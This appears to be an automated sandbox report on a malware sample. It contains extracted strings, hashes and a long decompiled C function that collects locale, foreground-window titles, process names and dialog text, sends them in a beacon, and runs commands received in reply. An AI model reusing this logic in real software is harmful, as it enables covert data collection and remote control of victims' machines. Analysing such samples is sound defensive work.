                                                                                                        • String ID: Error: $ NoOfAccepts: $ Not logged Errors:$ with error $127.0.0.1$?s=$?s=00000000$GET $POST $SockList.IncomingDenied.HTTP NoOfRejects: $SockList.IncomingDenied.TCP$SockList.InvalidUDP$SocketListener.startListening: bad arguments$SocketListener.startListening: bind failed on port $SocketListener.startListening: listen failed with error $SocketListener.startListening: setsockopt(SO_BROADCAST) failed with error $SocketListener.startListening: setsockopt(SO_REUSEADDR) failed with error $SocketListener.startListening: socket failed with error $StartWT.Bind.FinalFailure P=$StartWT.Listening P=$StartWT.PortInUse P=$ncSocklist.Already.gracefully.closed.socket: $ncSocklist.Error.On.select: $ncSocklist.Error.reading.from.socket: $ncSocklist.No.ConnectionThread.for.SessionID: $ncSocklist.Socket.TimedOut.With.No.Action: $ncSocklist.Wrong.Data.on.Port.80: $nsSocklist.Error.On.accept: $nsSocklist.Listening.Port.is.not.valid m_Port=
                                                                                                        • API String ID: 1630412927-1562165143
                                                                                                        • Opcode ID: 4cfe26dab35c236e537793b3f9c6b7ad720aee8c513f5574cf2cfc33c062dde0
                                                                                                        • Instruction ID: e6a55ac8a3c887517d54c0f1ee48ae6acae04ec2c4a80ba988411a6c71074ed7
                                                                                                        • Opcode Fuzzy Hash: 4cfe26dab35c236e537793b3f9c6b7ad720aee8c513f5574cf2cfc33c062dde0
                                                                                                        • Instruction Fuzzy Hash: 3DD2E4B0C00248EEEF25EBA4CC85AEDBB78BF65304F14419DE14667191EB785F88CB25
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70987240, Relevance: 130.3, APIs: 71, Strings: 3, Instructions: 807memorytimewindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E70987240(intOrPtr _a8, char _a49, char _a50) {
				intOrPtr _v0;
				char _v3;
				short _v576;
				char _v580;
				short _v1112;
				short _v1120;
				short _v1616;
				short _v1624;
				char _v2120;
				short _v2128;
				short _v2148;
				char _v2156;
				char _v2160;
				struct HWND__* _v2172;
				char _v2176;
				void* _v2192;
				struct HWND__* _v2196;
				struct tagMSG _v2220;
				intOrPtr _v2224;
				char _v2232;
				char _v2236;
				struct _FILETIME _v2244;
				struct HWND__* _v2248;
				struct HWND__* _v2252;
				struct HWND__* _v2256;
				struct HWND__* _v2260;
				void _v2264;
				void* _v2268;
				void* _v2276;
				char _v2280;
				void* _v2284;
				void* _v2288;
				void* _v2296;
				void* _v2300;
				void* _v2304;
				intOrPtr _v2308;
				signed int _v2312;
				short _v2316;
				intOrPtr _v2320;
				void* _v2340;
				short _v2348;
				int _v2352;
				short _v2356;
				short _v2360;
				long _v2364;
				long _v2368;
				int _v2372;
				intOrPtr _v2376;
				intOrPtr _v2380;
				void* _v2396;
				int _v2400;
				void* _t253;
				signed int _t260;
				signed int _t261;
				char _t263;
				intOrPtr _t264;
				int _t271;
				int _t272;
				void* _t280;
				signed short _t281;
				intOrPtr _t282;
				long _t287;
				int _t288;
				struct HWND__* _t289;
				int _t292;
				struct HWND__* _t295;
				void* _t298;
				int _t304;
				void** _t305;
				int _t306;
				void* _t307;
				signed char _t310;
				signed int _t311;
				WCHAR* _t316;
				WCHAR* _t317;
				signed int _t325;
				signed int _t326;
				void* _t329;
				intOrPtr _t331;
				long _t335;
				int _t346;
				struct HWND__* _t348;
				struct HWND__* _t351;
				int _t352;
				long _t356;
				char* _t359;
				struct HWND__* _t385;
				int _t388;
				intOrPtr _t392;
				char _t394;
				intOrPtr _t395;
				int _t398;
				intOrPtr _t399;
				WCHAR* _t414;
				signed int _t415;
				WCHAR* _t421;
				signed int _t440;
				intOrPtr _t445;
				short _t446;
				signed int _t447;
				MSG* _t450;
				intOrPtr _t452;
				WCHAR* _t453;
				WCHAR* _t463;
				WCHAR* _t467;
				void* _t490;
				void* _t491;
				void* _t492;
				int _t493;
				void* _t494;
				struct HWND__* _t495;
				void* _t496;
				void* _t497;
				void _t498;
				long _t499;
				CHAR* _t500;
				void* _t501;
				void* _t503;
				void* _t508;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t514;
				void* _t516;
				CHAR* _t517;
				char* _t518;
				char* _t519;
				signed int _t520;
				void* _t522;
				void* _t523;
				void* _t524;
				void* _t525;
				void* _t527;
				void* _t528;
				void* _t529;
				void* _t537;
				void* _t538;
				void* _t547;
				void* _t559;

				_t522 = (_t520 & 0xfffffff8) - 0x908;
				_push(0x14);
				_push( &_v2232);
				L7098BF02();
				_t385 = 0;
				_t253 = VirtualAlloc(0, 0x1000, 0x1000, 4); // executed
				_t503 = _t253;
				if(_t503 == 0) {
					L95:
					return 0;
				} else {
					_push(0x14);
					_push( &_v2120);
					L7098BF02();
					GetLocaleInfoW(0x400, 0x5a,  &_v2128, 9);
					CharLowerW( &_v2128);
					_push(0x11c);
					_push(0x7098f3d0);
					L7098BF02();
					_push( &_v2300);
					_push( &_v2304);
					_push( &_v2296);
					 *0x7098f3d0 = 0x11c;
					_v2296 = 0;
					_v2304 = 0;
					_v2300 = 0;
					L7098BF44();
					 *0x7098f3dc = _v2312 & 0x0000ffff;
					_t260 =  *0x7098f558; // 0x6caf0000
					 *0x7098f3d4 = _v2308;
					 *0x7098f3d8 = _v2316;
					 *0x7098f4ea = 4;
					if(_t260 != 0) {
						_push(0x4b4ca51f);
						_push(1);
						_t440 =  &_v2288;
						_push(_t440);
						_push(_t260);
						_v2288 = 0x1560f705;
						_v2284 = 0;
						_v2280 = 0;
						_v2276 = 0;
						E70981E40();
						_t260 = _v2276;
						_t522 = _t522 + 0x10;
						if(_t260 != 0) {
							_v2340 = 0;
							_t260 =  *_t260(0, 0x65,  &_v2340); // executed
							if(_t260 == 0) {
								_t260 = _v2352;
								if(_t260 != 0) {
									_t260 =  *(_t260 + 0x10) & 0x00001000;
									 *0x7098f4ea = _t440 & 0xffffff00 | _t260 == 0x00001000;
								}
							}
						}
					}
					_push(0x34);
					_push(_t503);
					L7098BF02();
					 *((intOrPtr*)(_t503 + 2)) = 0x832eb9b;
					 *((short*)(_t503 + 6)) = 0x102;
					 *((char*)(_t503 + 8)) = 1;
					_t445 =  *0x7098f594; // 0x43a82b81
					 *((intOrPtr*)(_t503 + 0x18)) = _t445;
					_t537 =  *0x7098f5bc - _t385; // 0x1
					_v2360 = _t385;
					_t261 = _t260 & 0xffffff00 | _t537 != 0x00000000;
					 *(_t503 + 9) = _t261;
					_t392 =  *0x7098f3d4; // 0xa
					 *((intOrPtr*)(_t503 + 0x1c)) = _t392;
					_t446 =  *0x7098f3d8; // 0x0
					 *(_t503 + 0x20) = _t446;
					_t538 =  *0x7098f59c - _t385; // 0x1
					 *((char*)(_t503 + 0xa)) = _t261 & 0xffffff00 | _t538 != 0x00000000;
					 *((short*)(_t503 + 0x12)) =  *0x7098f4ea & 0x000000ff;
					_t447 =  *0x7098f3dc; // 0x42ee
					 *(_t503 + 0x24) = _t447;
					_t263 =  *0x7098f5f4; // 0x1
					 *((char*)(_t503 + 0xc)) = _t263;
					_t394 =  *0x7098f5f8; // 0x1
					 *((char*)(_t503 + 0xb)) = _t394;
					 *(_t503 + 0xf) = _t385;
					 *((char*)(_t503 + 0x11)) = 0x16;
					_t264 =  *0x7098f5a8; // 0xa521e0
					_t490 = E7098A7A0(_t264, 1,  &_v2360);
					_t523 = _t522 + 0xc;
					if(_t490 != _t385) {
						_t47 = _t503 + 0x34; // 0x34
						RtlMoveMemory(_t47, _t490, _v2360);
						HeapFree(GetProcessHeap(), _t385, _t490);
					}
					_t395 =  *0x7098f5b4; // 0xa599f8
					_v2360 = _t385;
					_t491 = E7098A7A0(_t395, 1,  &_v2360);
					_t524 = _t523 + 0xc;
					if(_t491 != _t385) {
						_t53 =  &_a49; // 0x35
						RtlMoveMemory(_t503 + _t53, _t491, _v2360);
						HeapFree(GetProcessHeap(), _t385, _t491);
					}
					_t492 = _v2360 +  &_a50;
					_v2360 = _t385;
					_t508 = E7098A7A0( &_v2156, 1,  &_v2360);
					_t525 = _t524 + 0xc;
					if(_t508 != _t385) {
						RtlMoveMemory(_t492 + _t503, _t508, _v2360);
						HeapFree(GetProcessHeap(), _t385, _t508);
					}
					_v2308 = _t492 + _v2360 + 1;
					_t271 = SetTimer(_t385, _t385, _t385, _t385); // executed
					_t450 =  &_v2220;
					_t493 = _t271;
					_v2340 = 0x28;
					_v2316 = 1;
					_t272 = GetMessageW(_t450, _t385, _t385, _t385);
					if(_t272 == _t385) {
						L94:
						VirtualFree(_t503, _t385, 0x8000);
						goto L95;
					} else {
						L14:
						L14:
						if(_v2316 == _t385) {
							_t398 = _v2220.message;
						} else {
							_t398 = 0x113;
							_v2316 = _t385;
							_v2220.message = 0x113;
							_v2220.hwnd = _t385;
							_v2220.wParam = _t493;
						}
						if(_t272 == 0xffffffff || _t398 == 0x10) {
							goto L93;
						}
						if(_t398 == 0x113) {
							if(_v2220.hwnd != _t385) {
								L91:
								_t450 =  &_v2220;
								DispatchMessageW(_t450);
								_t272 = GetMessageW( &_v2220, _t385, _t385, _t385);
								if(_t272 != _t385) {
									goto L14;
								}
								goto L94;
							}
							L23:
							if(_t547 != 0) {
								goto L91;
							}
							KillTimer(_t385, _t493);
							_push(_t385);
							_push( &_v2280);
							E70986F50();
							_t399 =  *0x7098f588; // 0x79a25c
							_t280 = E709839F0(_t399, _t385, _t385, 1);
							_t281 = _v2312;
							_t494 = _t503 + _t281;
							_push(0x1000 - _t281);
							_push(_t494);
							 *((char*)(_t503 + 0xe)) = _t450 & 0xffffff00 | _t280 != 0x00000000;
							L7098BF02();
							_t452 =  *0x7098f5a8; // 0xa521e0
							_t282 =  *0x7098f5b4; // 0xa599f8
							_push(_t452);
							_push(_t282);
							_v2372 = _t385;
							wsprintfW( &_v1624, StrChrW(0x7098ca4c, 0x25));
							_t453 =  *0x7098f580; // 0xa65be8
							_t527 = _t525 + 0x28;
							_t287 = GetPrivateProfileStringW(StrChrW(0x7098cddc, 0x50),  &_v1616, _t385,  &_v576, 0x103, _t453); // executed
							if(_t287 != 0) {
								_t514 = E7098A7A0( &_v580, 1,  &_v2372);
								_t527 = _t527 + 0xc;
								if(_t514 != _t385) {
									RtlMoveMemory(_t494, _t514, _v2372);
									HeapFree(GetProcessHeap(), _t385, _t514);
								}
							}
							_t288 = _v2372;
							_v2368 = _t288 + _v2320 + 1;
							 *((intOrPtr*)(_t503 + 0x30)) = _t288;
							_t289 = GetForegroundWindow(); // executed
							_t495 = _t289;
							_v2148 = 0;
							if(_t495 != _t385) {
								GetWindowTextW(_t495,  &_v2148, 0x104);
							}
							_v2372 = _t385;
							_t510 = E7098A7A0( &_v2148, 1,  &_v2372);
							_t528 = _t527 + 0xc;
							if(_t510 != _t385) {
								RtlMoveMemory(_t503 + _v2368, _t510, _v2372);
								HeapFree(GetProcessHeap(), _t385, _t510);
							}
							_t511 = _v2368 + _v2372 + 1;
							_v2148 = 0;
							_v2372 = _t385;
							if(_t495 != _t385) {
								_v2364 = _t385;
								GetWindowThreadProcessId(_t495,  &_v2364);
								_t356 = _v2364;
								if(_t356 > _t385) {
									_v2220.pt = _t356;
									asm("pxor xmm0, xmm0");
									_v2368 = _t385;
									_v2196 = _t385;
									_v2192 = 0x18;
									asm("movq [esp+0xd8], xmm0");
									asm("movq [esp+0xe0], xmm0");
									_v2172 = _t385;
									if(NtOpenProcess( &_v2368, 0x410,  &_v2192,  &(_v2220.pt)) >= 0) {
										_push(0x104);
										_t359 =  &_v2160;
										_push(_t359);
										_push(_t385);
										_push(_v2380);
										L7098BF9E();
										if(_t359 != 0) {
											_t501 = E7098A7A0( &_v2176, 1,  &_v2400);
											_t528 = _t528 + 0xc;
											if(_t501 != _t385) {
												RtlMoveMemory(_t503 + _t511, _t501, _v2400);
												HeapFree(GetProcessHeap(), _t385, _t501);
											}
										}
										NtClose(_v2396);
									}
								}
							}
							_t292 = 0;
							_t496 = _v2372 +  &_v3;
							_v2368 = _t496;
							_v2372 = 0;
							_t559 =  *0x7098f3c8 - _t385; // 0xc003a
							if(_t559 == 0) {
								L54:
								_t497 = _t496 + _t292 + 1;
								_v2348 = 1;
								if(_t292 > 1) {
									_t348 =  *0x7098f3c8; // 0xc003a
									_t517 = _t497 + _t503;
									_t292 = GetDlgItemTextA(_t348, 0x4e83, _t517, 0xfff - _t497); // executed
									_v2372 = _t292;
									if(_t292 > _t385 &&  *_t503 == 0x2d) {
										_t292 = 0;
										_v2372 = 0;
										 *_t517 = 0;
										 *((char*)(_t497 + _t503 + 1)) = 0;
									}
								}
								_v2252 = _t385;
								_v2248 = _t385;
								_v2260 = _t385;
								_v2256 = _t385;
								_t498 = _t497 + _t292 + 1;
								_v2352 = _t385;
								 *(_t503 + 0x2c) = _t385;
								 *(_t503 + 0x28) = _t385;
								if(_v2224 != 0x83fe) {
									L61:
									 *((char*)(_t503 + 0xd)) = 0;
									 *(_t503 + 0x14) = _t385;
									goto L62;
								} else {
									_t346 = _v2220.message;
									if(_t346 == _t385) {
										goto L61;
									}
									 *((char*)(_t503 + 0xd)) =  *((intOrPtr*)(_t346 + 0x10));
									 *(_t503 + 0x14) =  *(_t346 + 4);
									_v2252 =  *((intOrPtr*)(_t346 + 0x14));
									_v2248 =  *(_t346 + 0x18);
									_v2352 = _t346;
									 *(_t503 + 0x2c) =  *(_t346 + 0x18);
									L62:
									_push( &_v2364);
									_push( &_v2368);
									_v2368 = _t385;
									_v2364 = _t385;
									_v2356 = E70986B70();
									_v2260 = _v2368;
									_t295 = _v2364;
									_push(1);
									_v2256 = _t295;
									 *(_t503 + 0x28) = _t295;
									 *_t503 = _t498;
									E709857B0(_v2284, _v2288, _t503, _t498);
									_t297 = _v2252;
									_t529 = _t528 + 0x1c;
									_v2268 = _t503;
									_v2264 = _t498;
									if(_v2252 != _t385) {
										_push(1);
										E709857B0(_v2284, _v2288, _t297, _v2248);
										_t529 = _t529 + 0x14;
									}
									_push(0x7098cdd4);
									_push( &_v2288);
									_t298 = E70985A50();
									_push(_t385);
									_t512 = _t298;
									E709857B0(_v2284, _v2288, _t503, _t498);
									_t525 = _t529 + 0x1c;
									if(_v2356 != _t385) {
										VirtualFree(_v2368, _t385, 0x8000); // executed
									}
									_v2356 = _t385;
									if(_t512 <= _t385) {
										L81:
										_push(8);
										_push( &_v2236);
										L7098BF02();
										GetSystemTimeAsFileTime( &_v2244);
										_v2316 = _v2244.dwLowDateTime;
										_v2312 = _v2244.dwHighDateTime;
										_v2368 = _t385;
										RtlTimeToSecondsSince1970( &_v2316,  &_v2368);
										_t463 =  *0x7098f57c; // 0xa65be8
										_v2356 = 0;
										_t414 =  *0x7098f58c; // 0x7837d8
										_v2360 = 0x640067;
										_t304 = GetPrivateProfileIntW(_t414,  &_v2360, _t385, _t463);
										if(_t304 != _t385) {
											if(_t304 <= _v2376) {
												_push(_t385);
												_push(_t385);
												E70986F50();
												_t525 = _t525 + 8;
											}
										} else {
											_t310 = _v2288;
											_t311 = _t310 & 0x000000ff;
											if(_t310 == 0) {
												_t311 = 1;
											}
											_push(_t311 * 0xe10 + _v2376);
											wsprintfW( &_v1120, StrChrW(0x7098cda0, 0x25));
											_t316 =  *0x7098f57c; // 0xa65be8
											_t525 = _t525 + 0xc;
											_t317 =  *0x7098f58c; // 0x7837d8
											WritePrivateProfileStringW(_t317,  &_v2356,  &_v1112, _t316);
										}
										goto L87;
									} else {
										if(_t512 < 0x12) {
											L80:
											HeapFree(GetProcessHeap(), _t385, _v2244.dwLowDateTime);
											if(_v2356 != _t385) {
												L87:
												_t305 = _v2368;
												if(_t305 != _t385) {
													_t307 =  *_t305;
													if(_t307 != _t385) {
														SetEvent(_t307);
													}
												}
												_t415 =  *0x7098f000; // 0x3c
												_t306 = SetTimer(_t385, _t385, _t415 * 0x3e8, _t385); // executed
												_t493 = _t306;
												goto L91;
											}
											goto L81;
										}
										_push(_t385);
										E709857B0(_v2284, _v2288, _v2244.dwLowDateTime, _t512);
										_t499 = _v2244.dwLowDateTime;
										_t525 = _t525 + 0x14;
										if( *_t499 != 0x832eb9b) {
											goto L80;
										}
										_t467 =  *0x7098f57c; // 0xa65be8
										_v2312 = 0;
										_t421 =  *0x7098f58c; // 0x7837d8
										_v2356 = 1;
										_v2316 = 0x640067;
										WritePrivateProfileStringW(_t421,  &_v2316, _t385, _t467); // executed
										_t325 =  *(_t499 + 4) & 0x0000ffff;
										if(_t325 < 0xa) {
											 *0x7098f000 = 0x3c;
										} else {
											 *0x7098f000 = _t325;
										}
										_t326 =  *(_t499 + 0xc) & 0x0000ffff;
										_v2368 = _t385;
										if(_t326 <= _t385) {
											L77:
											E70986E50(_t385, _t385, _t385, _t385);
											_t525 = _t525 + 0x10;
											goto L78;
										} else {
											_v2364 = _t326 + _v2244.dwLowDateTime + 0x13;
											_t516 = E7098A810(_v2244.dwLowDateTime + 0x12, _t385, _t385);
											_t525 = _t525 + 0xc;
											if(_t516 == _t385) {
												goto L77;
											}
											_t335 = E7098A810(_v2364, _t385, _t385);
											_t525 = _t525 + 0xc;
											_v2364 = _t335;
											if(_t335 != _t385) {
												E70986E50(_t516, _v2364,  *(_t499 + 0xb) & 0x000000ff,  *(_t499 + 0xa) & 0x000000ff);
												_t525 = _t525 + 0x10;
												_v2368 = 1;
												HeapFree(GetProcessHeap(), _t385, _v2364);
											}
											HeapFree(GetProcessHeap(), _t385, _t516);
											if(_v2368 != _t385) {
												L78:
												if( *((intOrPtr*)(_t499 + 0x10)) > _t385) {
													_t329 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
													_v0 =  *((intOrPtr*)(_t499 + 6));
													_t331 = E7098A810(( *(_t499 + 0xc) & 0x0000ffff) + _v2244 + ( *(_t499 + 0xe) & 0x0000ffff) + 0x14, 1, 0);
													_t525 = _t525 + 0xc;
													_a8 = _t331;
													CloseHandle(CreateThread(0, 0, E70985F30, _t329, 0, 0));
													Sleep(0x1f4);
													_t385 = 0;
												}
												goto L80;
											} else {
												goto L77;
											}
										}
									}
								}
							} else {
								_t518 = 0;
								if(_v2348 <= _t385) {
									goto L54;
								}
								_v2352 = 0xfff - _t496;
								_t500 = _t496 + _t503;
								L41:
								L41:
								if(_t518 > 0) {
									Sleep(0x1f4); // executed
								}
								_t351 =  *0x7098f3c8; // 0xc003a
								_t352 = GetDlgItemTextA(_t351, 0x4e82, _t500, _v2352); // executed
								_t388 = _t352;
								if( *_t503 == 0x2d || _t388 < 0xb) {
									goto L45;
								}
								_t519 = 0;
								if(_t388 <= 0) {
									L52:
									_t292 = _t388;
									_v2372 = _t292;
									L53:
									_t496 = _v2368;
									_t385 = 0;
									goto L54;
								}
								do {
									if(StrTrimA( &(_t500[_t519]), StrChrA(0x7098cdd8, 0x20)) != 0) {
										_t388 = _t388 - 1;
									}
									_t519 =  &_v3;
								} while (_t519 < _t388);
								goto L52;
								L45:
								_t292 = 0;
								_t518 =  &_v3;
								_v2372 = 0;
								 *_t500 = 0;
								if(_t518 < _v2348) {
									goto L41;
								}
								goto L53;
							}
						}
						_t547 = _t398 - 0x83fe;
						goto L23;
						L93:
						KillTimer(_t385, _t493);
						goto L94;
					}
				}
			}














































































































































                                                                                                        0x70987246
                                                                                                        0x70987250
                                                                                                        0x70987256
                                                                                                        0x70987257
                                                                                                        0x70987268
                                                                                                        0x7098726b
                                                                                                        0x70987271
                                                                                                        0x70987275
                                                                                                        0x70987cef
                                                                                                        0x70987cf8
                                                                                                        0x7098727b
                                                                                                        0x7098727b
                                                                                                        0x70987284
                                                                                                        0x70987285
                                                                                                        0x7098729b
                                                                                                        0x709872a9
                                                                                                        0x709872af
                                                                                                        0x709872b4
                                                                                                        0x709872b9
                                                                                                        0x709872c2
                                                                                                        0x709872c7
                                                                                                        0x709872cc
                                                                                                        0x709872cd
                                                                                                        0x709872d7
                                                                                                        0x709872db
                                                                                                        0x709872df
                                                                                                        0x709872e3
                                                                                                        0x709872f5
                                                                                                        0x709872fa
                                                                                                        0x709872ff
                                                                                                        0x70987305
                                                                                                        0x7098730b
                                                                                                        0x70987314
                                                                                                        0x70987316
                                                                                                        0x7098731b
                                                                                                        0x7098731d
                                                                                                        0x70987321
                                                                                                        0x70987322
                                                                                                        0x70987323
                                                                                                        0x7098732b
                                                                                                        0x7098732f
                                                                                                        0x70987333
                                                                                                        0x70987337
                                                                                                        0x7098733c
                                                                                                        0x70987340
                                                                                                        0x70987345
                                                                                                        0x7098734f
                                                                                                        0x70987353
                                                                                                        0x70987357
                                                                                                        0x70987359
                                                                                                        0x7098735f
                                                                                                        0x70987364
                                                                                                        0x70987371
                                                                                                        0x70987371
                                                                                                        0x7098735f
                                                                                                        0x70987357
                                                                                                        0x70987345
                                                                                                        0x70987377
                                                                                                        0x70987379
                                                                                                        0x7098737a
                                                                                                        0x7098737f
                                                                                                        0x70987386
                                                                                                        0x7098738c
                                                                                                        0x70987390
                                                                                                        0x70987396
                                                                                                        0x70987399
                                                                                                        0x7098739f
                                                                                                        0x709873a3
                                                                                                        0x709873a6
                                                                                                        0x709873a9
                                                                                                        0x709873af
                                                                                                        0x709873b2
                                                                                                        0x709873b8
                                                                                                        0x709873bb
                                                                                                        0x709873c4
                                                                                                        0x709873ce
                                                                                                        0x709873d2
                                                                                                        0x709873d8
                                                                                                        0x709873db
                                                                                                        0x709873e0
                                                                                                        0x709873e3
                                                                                                        0x709873ee
                                                                                                        0x709873f1
                                                                                                        0x709873f5
                                                                                                        0x709873f9
                                                                                                        0x70987406
                                                                                                        0x70987408
                                                                                                        0x7098740d
                                                                                                        0x70987415
                                                                                                        0x70987419
                                                                                                        0x70987427
                                                                                                        0x70987427
                                                                                                        0x7098742d
                                                                                                        0x7098743f
                                                                                                        0x70987448
                                                                                                        0x7098744a
                                                                                                        0x7098744f
                                                                                                        0x70987457
                                                                                                        0x7098745c
                                                                                                        0x7098746a
                                                                                                        0x7098746a
                                                                                                        0x70987483
                                                                                                        0x70987487
                                                                                                        0x70987490
                                                                                                        0x70987492
                                                                                                        0x70987497
                                                                                                        0x709874a3
                                                                                                        0x709874b1
                                                                                                        0x709874b1
                                                                                                        0x709874c3
                                                                                                        0x709874c7
                                                                                                        0x709874d0
                                                                                                        0x709874d8
                                                                                                        0x709874da
                                                                                                        0x709874e2
                                                                                                        0x709874ea
                                                                                                        0x709874f2
                                                                                                        0x70987ce2
                                                                                                        0x70987ce9
                                                                                                        0x00000000
                                                                                                        0x709874f8
                                                                                                        0x00000000
                                                                                                        0x709874fe
                                                                                                        0x70987502
                                                                                                        0x70987524
                                                                                                        0x70987504
                                                                                                        0x70987504
                                                                                                        0x70987509
                                                                                                        0x7098750d
                                                                                                        0x70987514
                                                                                                        0x7098751b
                                                                                                        0x7098751b
                                                                                                        0x7098752e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987543
                                                                                                        0x70987554
                                                                                                        0x70987cb1
                                                                                                        0x70987cb1
                                                                                                        0x70987cb9
                                                                                                        0x70987cca
                                                                                                        0x70987cd2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987cd8
                                                                                                        0x70987561
                                                                                                        0x70987561
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987569
                                                                                                        0x70987573
                                                                                                        0x70987574
                                                                                                        0x70987575
                                                                                                        0x7098757a
                                                                                                        0x70987585
                                                                                                        0x7098758f
                                                                                                        0x7098759d
                                                                                                        0x709875a0
                                                                                                        0x709875a1
                                                                                                        0x709875a2
                                                                                                        0x709875a5
                                                                                                        0x709875aa
                                                                                                        0x709875b0
                                                                                                        0x709875b5
                                                                                                        0x709875b6
                                                                                                        0x709875be
                                                                                                        0x709875cd
                                                                                                        0x709875d3
                                                                                                        0x709875d9
                                                                                                        0x709875fd
                                                                                                        0x70987605
                                                                                                        0x7098761b
                                                                                                        0x7098761d
                                                                                                        0x70987622
                                                                                                        0x7098762b
                                                                                                        0x70987639
                                                                                                        0x70987639
                                                                                                        0x70987622
                                                                                                        0x7098763f
                                                                                                        0x7098764b
                                                                                                        0x7098764f
                                                                                                        0x70987652
                                                                                                        0x70987658
                                                                                                        0x7098765c
                                                                                                        0x70987666
                                                                                                        0x70987676
                                                                                                        0x70987676
                                                                                                        0x7098768b
                                                                                                        0x70987694
                                                                                                        0x70987696
                                                                                                        0x7098769b
                                                                                                        0x709876aa
                                                                                                        0x709876b8
                                                                                                        0x709876b8
                                                                                                        0x709876c8
                                                                                                        0x709876cc
                                                                                                        0x709876d4
                                                                                                        0x709876da
                                                                                                        0x709876e6
                                                                                                        0x709876ea
                                                                                                        0x709876f0
                                                                                                        0x709876f6
                                                                                                        0x709876fc
                                                                                                        0x7098771c
                                                                                                        0x70987721
                                                                                                        0x70987725
                                                                                                        0x7098772c
                                                                                                        0x70987737
                                                                                                        0x70987740
                                                                                                        0x70987749
                                                                                                        0x70987757
                                                                                                        0x7098775d
                                                                                                        0x70987762
                                                                                                        0x70987769
                                                                                                        0x7098776a
                                                                                                        0x7098776b
                                                                                                        0x7098776c
                                                                                                        0x70987773
                                                                                                        0x70987789
                                                                                                        0x7098778b
                                                                                                        0x70987790
                                                                                                        0x7098779c
                                                                                                        0x709877aa
                                                                                                        0x709877aa
                                                                                                        0x70987790
                                                                                                        0x709877b5
                                                                                                        0x709877b5
                                                                                                        0x70987757
                                                                                                        0x709876f6
                                                                                                        0x709877be
                                                                                                        0x709877c0
                                                                                                        0x709877c4
                                                                                                        0x709877c8
                                                                                                        0x709877cc
                                                                                                        0x709877d2
                                                                                                        0x7098786e
                                                                                                        0x7098786e
                                                                                                        0x70987872
                                                                                                        0x7098787d
                                                                                                        0x7098787f
                                                                                                        0x7098788c
                                                                                                        0x70987896
                                                                                                        0x7098789c
                                                                                                        0x709878a2
                                                                                                        0x709878a9
                                                                                                        0x709878ab
                                                                                                        0x709878af
                                                                                                        0x709878b2
                                                                                                        0x709878b2
                                                                                                        0x709878a2
                                                                                                        0x709878c1
                                                                                                        0x709878c8
                                                                                                        0x709878cf
                                                                                                        0x709878d6
                                                                                                        0x709878dd
                                                                                                        0x709878e1
                                                                                                        0x709878e5
                                                                                                        0x709878e8
                                                                                                        0x709878eb
                                                                                                        0x70987924
                                                                                                        0x70987924
                                                                                                        0x70987928
                                                                                                        0x00000000
                                                                                                        0x709878ed
                                                                                                        0x709878ed
                                                                                                        0x709878f6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709878fb
                                                                                                        0x70987901
                                                                                                        0x70987907
                                                                                                        0x70987911
                                                                                                        0x70987918
                                                                                                        0x7098791f
                                                                                                        0x7098792b
                                                                                                        0x7098792f
                                                                                                        0x70987934
                                                                                                        0x70987935
                                                                                                        0x70987939
                                                                                                        0x70987942
                                                                                                        0x7098794a
                                                                                                        0x70987951
                                                                                                        0x70987955
                                                                                                        0x70987957
                                                                                                        0x7098795f
                                                                                                        0x70987962
                                                                                                        0x70987970
                                                                                                        0x70987975
                                                                                                        0x7098797c
                                                                                                        0x7098797f
                                                                                                        0x70987983
                                                                                                        0x70987989
                                                                                                        0x70987996
                                                                                                        0x709879a0
                                                                                                        0x709879a5
                                                                                                        0x709879a5
                                                                                                        0x709879ac
                                                                                                        0x709879b1
                                                                                                        0x709879b2
                                                                                                        0x709879bb
                                                                                                        0x709879be
                                                                                                        0x709879c6
                                                                                                        0x709879cb
                                                                                                        0x709879d2
                                                                                                        0x709879df
                                                                                                        0x709879df
                                                                                                        0x709879e5
                                                                                                        0x709879eb
                                                                                                        0x70987ba0
                                                                                                        0x70987ba0
                                                                                                        0x70987ba9
                                                                                                        0x70987baa
                                                                                                        0x70987bb7
                                                                                                        0x70987bcf
                                                                                                        0x70987bd9
                                                                                                        0x70987bdd
                                                                                                        0x70987be1
                                                                                                        0x70987be6
                                                                                                        0x70987bf4
                                                                                                        0x70987bf9
                                                                                                        0x70987c01
                                                                                                        0x70987c09
                                                                                                        0x70987c11
                                                                                                        0x70987c72
                                                                                                        0x70987c74
                                                                                                        0x70987c75
                                                                                                        0x70987c76
                                                                                                        0x70987c7b
                                                                                                        0x70987c7b
                                                                                                        0x70987c13
                                                                                                        0x70987c13
                                                                                                        0x70987c19
                                                                                                        0x70987c1c
                                                                                                        0x70987c1e
                                                                                                        0x70987c1e
                                                                                                        0x70987c2d
                                                                                                        0x70987c44
                                                                                                        0x70987c4a
                                                                                                        0x70987c4f
                                                                                                        0x70987c53
                                                                                                        0x70987c66
                                                                                                        0x70987c66
                                                                                                        0x00000000
                                                                                                        0x709879f1
                                                                                                        0x709879f4
                                                                                                        0x70987b80
                                                                                                        0x70987b90
                                                                                                        0x70987b9a
                                                                                                        0x70987c7e
                                                                                                        0x70987c7e
                                                                                                        0x70987c84
                                                                                                        0x70987c86
                                                                                                        0x70987c8a
                                                                                                        0x70987c8d
                                                                                                        0x70987c8d
                                                                                                        0x70987c8a
                                                                                                        0x70987c93
                                                                                                        0x70987ca3
                                                                                                        0x70987caf
                                                                                                        0x00000000
                                                                                                        0x70987caf
                                                                                                        0x00000000
                                                                                                        0x70987b9a
                                                                                                        0x70987a09
                                                                                                        0x70987a0e
                                                                                                        0x70987a13
                                                                                                        0x70987a1a
                                                                                                        0x70987a23
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987a29
                                                                                                        0x70987a37
                                                                                                        0x70987a3c
                                                                                                        0x70987a44
                                                                                                        0x70987a4c
                                                                                                        0x70987a54
                                                                                                        0x70987a5a
                                                                                                        0x70987a61
                                                                                                        0x70987a6d
                                                                                                        0x70987a63
                                                                                                        0x70987a65
                                                                                                        0x70987a65
                                                                                                        0x70987a77
                                                                                                        0x70987a7b
                                                                                                        0x70987a82
                                                                                                        0x70987b0a
                                                                                                        0x70987b0e
